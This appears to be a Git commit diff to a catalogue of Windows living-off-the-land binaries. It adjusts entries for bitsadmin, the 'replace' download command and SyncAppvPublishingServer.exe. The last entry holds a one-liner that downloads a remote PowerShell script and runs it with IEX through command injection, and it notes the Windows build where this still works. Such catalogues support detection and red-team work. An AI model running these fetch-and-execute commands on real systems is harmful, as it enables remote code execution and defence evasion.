Merge pull request #20 from jenic/master

Some minor modifications
master
Oddvar Moe 2018-05-21 17:33:09 +02:00 committed by GitHub
commit 1e9ae3aa9b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 5 additions and 4 deletions

View File

@ -40,6 +40,7 @@ c:\windows\sysWOW64\bitsadmin.exe
```
Notes:
* Requires active user (doesn't work from a web shell)
Detection:

View File

@ -3,9 +3,9 @@
* Functions: Copy, Download
```
replace c:\source\file.cab c:\destination /A
replace c:\source\file.cab c:\destination /A
replace \\http://webdav.host.com \foo\bar.exe c:\outdir /A
replace \\webdav.host.com\foo\bar.exe c:\outdir /A
```

View File

@ -3,7 +3,7 @@
* Functions: Execute
```
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
```
Acknowledgements:
@ -23,6 +23,6 @@ C:\Windows\System32\SyncAppvPublishingServer.exe
Notes:
Command injection into PowerShell
Might have been fixed in newest version of Windows 10.
(Works as of 10.0.16299.371)